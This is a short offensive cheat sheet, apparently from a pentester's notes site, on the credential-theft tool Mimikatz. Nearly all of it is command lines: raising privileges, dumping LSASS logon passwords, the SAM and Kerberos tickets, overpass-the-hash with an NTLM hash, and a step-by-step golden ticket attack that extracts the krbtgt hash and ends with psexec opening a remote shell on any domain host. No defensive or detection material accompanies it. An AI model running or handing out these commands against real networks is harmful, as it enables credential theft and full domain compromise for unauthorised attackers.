Skip to main content

Mimikatz

Overview

https://github.com/gentilkiwi/mimikatz

There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimkatz is primarily used to dump hashes from  LSASS, pass hashes, or generating Kerberos tickets for use in attacks.

 

 

General Usage

Elevate to Highest Integrity Level

C:\ > mimikatz.exe

mimikatz # privilege::debug
mimikatz # token::elevate

Dump Hashes in LSASS

mimikatz # sekurlsa::logonpasswords

Dump SAM

mimikatz # lsadump::sam

Dump Cached TGTs

mimikatz # sekurlsa::tickets

Overpass the Hash

Create a TGT using a dumpled NTLM hash

mimikatz # sekurlsa::pth /user:username /ntlm:hash-here /domain:domain.tld

 

 

Golden Ticket Attack

If an attacker runs mimikatz on a domain controller, they can access the Kerberos hash of the krbtgt account and arbitrarily create tickets for themselves to access any resource on the network.

C:\ > mimikatz.exe

mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt
  1. Copy the domain SID
  2. Copy the NTLM hash of the krbtgt account
mimikatz # kerberos::golden /User:Administrator /domain:domain.tld /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /id:500 /ptt

mimikatz # misc::cmd

Now, a command prompt is running with the golden ticket we created

C:\ > psexec.exe \\hostname cmd.exe

This enables an attacker to open a remote command prompt on any host in the domain, due to the availability of a golden ticket.

Back to top